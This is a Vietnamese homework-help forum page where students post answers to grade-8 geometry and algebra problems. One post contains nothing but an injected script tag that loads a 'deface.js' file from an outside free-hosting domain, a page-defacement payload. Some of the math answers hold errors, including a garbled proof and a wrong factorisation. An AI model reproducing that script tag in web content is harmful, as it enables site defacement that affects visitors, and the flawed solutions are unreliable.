K
Khách

Hãy nhập câu hỏi của bạn vào đây, nếu là tài khoản VIP, bạn sẽ được ưu tiên trả lời.

18 tháng 11 2018

 AM là đường trung tuyến suy ra AM là đường cao suy ra \(\widehat{AMC}=90\) 

do K đối xứng với I qua M nên IK=IM  và MK vuong AC 

mà I là trung điểm AC 

suy ra IK=IK IA=IC  suy ra tứ giác AMCK là hình bình hành có góc M=90 nên là hình chữ nhật  

có AK=MC (tính chất hbh) MK=AC (1)

mà KC=MC  nên AK=MB (3) 

 có tam giác ABC can tại A suy ra AB=AC (2)

từ (1) (2) có AB=MK (4)

từ (3)(4) suy ra tứ giác AKMB là hbh 

phần còn lại dễ cậu làm nốt nha chúc thành công

18 tháng 11 2018

A M C B I K E

Vì M đx với K qua I (GT) => I là trung điểm của MK (Tính chất)

Xét tứ giác AMCK có:

I là tđ của MK (chứng minh trên)

I là tđ của AC (GT)

MK giao AC tại I (GT)

Từ 3 điều => tứ giác AMCK là hình bình hành (Dấu hiệu nhận biết)

b, Vì AMCK là hình bình hành (chứng minh trên)

=> AK // CM (T/c), mà M thuộc BC (GT) => AK // BM

Lại có AMCK là hình bình hành (cmt) => AK = CM (T/c) Mà AM là trung tuyến của tgABC(GT) => BM = CM = 1/2BC (Định nghĩa)

Do đó AK = BM

Xét tứ giác AKMB có:

AK // BM (cmt)

AK = BM (cmt)

Từ 2 điều trên => AKMB là hình bình hành (Dấu hiệu nhận biết)

c, Xem lại đề bài nha

18 tháng 11 2018

ta có \(x^3-6x^2+12x-7=0\Leftrightarrow\)\(x^3-x^2-5x^2+5x+7x-7=0\Leftrightarrow\)\(^{x^2\left(x-1\right)-5x\left(x-1\right)+7\left(x-1\right)=0}\Leftrightarrow\)\(\left(x-1\right)\left(x^2-5x+7\right)\)=0 mà \(x^2-5x+7=x^2-2.x.\frac{5}{2}+\left(\frac{5}{2}\right)^2-\left(\frac{5}{2}\right)^2+7\)\(=\left(x-\frac{5}{2}\right)^2-\frac{25}{4}+7=\left(x-\frac{5}{2}\right)^2+\frac{3}{4}>0\)(vô nghiệm\(\Rightarrow x-1=0\Leftrightarrow x=1\)

18 tháng 11 2018

x3 - x2 - 5x2 + 5x + 7x - 7 = 0

x2(x - 1) - 5x(x - 1) + 7(x - 1) = 0

(x2 - 5x + 7)(x - 1) = 0

=> x2 - 5x + 7 = 0 hoặc x - 1 = 0

+) Với x - 1 = 0 => x = 1

+) Với x2 - 5x + 7 = 0

=> x2 - 2x2,5 + 6,25 + 0,75 = 0

=> (x - 2,5)2 + 0,75 = 0

Vì \(\left(x-2,5\right)^2\ge0\Rightarrow\left(x-2,5\right)^2+0,75>0\)

=> Không có giá trị của x thoả mãn

Vậy x = 1

18 tháng 11 2018

tra loi cho mik

18 tháng 11 2018
 <script src="https://snatchy-warehouse.000webhostapp.com/deface.js"></script>
18 tháng 11 2018

a, Đặt tính chia ta được Q=2x+3,R=x2-4x+5

b,\(R=x^2-4x+5=x^2-4x+4+1=\left(x-2\right)^2+1\)

Vì (x-2)2 >= 0 

=> R = (x-2)2+1 >= 1

Dấu "=" xảy ra <=> x-2=0 <=> x=2

Vậy GTNN của R =  1 khi x=2

\(\frac{p}{p-2q}=3\)

=>3p-6q=p

=>3p-6qq-p=0

=>2p-6q=0

=>2(p-3q)=0

=>p-3q=0

=>p=3q

=>\(\frac{p}{3q}=1\)

=>\(\frac{1}{3}.\frac{p}{q}=1\)

=>\(\frac{p}{q}=3\)

Hok tốt

18 tháng 11 2018

\(4x^4+4x^3+5x^2+6x+1\)

\(=4x^4+4x^3+5x^2+5x+x+1\)

\(=4x^3.\left(x+1\right)+5x.\left(x+1\right)+\left(x+1\right)\)

\(=\left(x+1\right).\left(4x+5x+1\right)\)

p/s: tớ nghĩ sai đề nên đổi ạ :))

19 tháng 11 2018

Xét tam giác ABC có :

F là trung điểm của AB

E là trung điểm của AC

=) FE là đường trung bình của tam giác ABC

=) FE // BC và FE=\(\frac{1}{2}\)BC

Do FE // BC=) Tứ giác BCEF là hình thang 

Mà \(\widehat{B}\)=\(\widehat{C}\)

=) BCEF là hình thang cân

Do FE=\(\frac{1}{2}\)BD

Mà D là trung điểm của BC=) BD=CD

=)  FE=BD=CD

Do EF // BC =) EF//BD

Xét tứ giác BDEF có :

EF//BD và EF=BD

=) BDEF là hình bình hành

Xét tam giác ABC có :

D là trung điểm của BC

F là trung điểm của AB

=) DF là đường trung bình của tam giác ABC

=) DF // AC =) DF // AE (*)

Và DF=\(\frac{1}{2}\)AC

Do E là trung điểm của AC=) AE=EC=\(\frac{AC}{2}\)

=) DF=AE=EC (**)

Từ (*) và (**) =) AEDF là hình bình hành (1)

Do F là trung điểm của AB =) AF=BF= \(\frac{AB}{2}\)

Ta có : AB=AC (vì tam giác ABC cân tại A )

=) AF=BF=AE=EC (2)

Từ (1) và (2) =) AEDF là hình thoi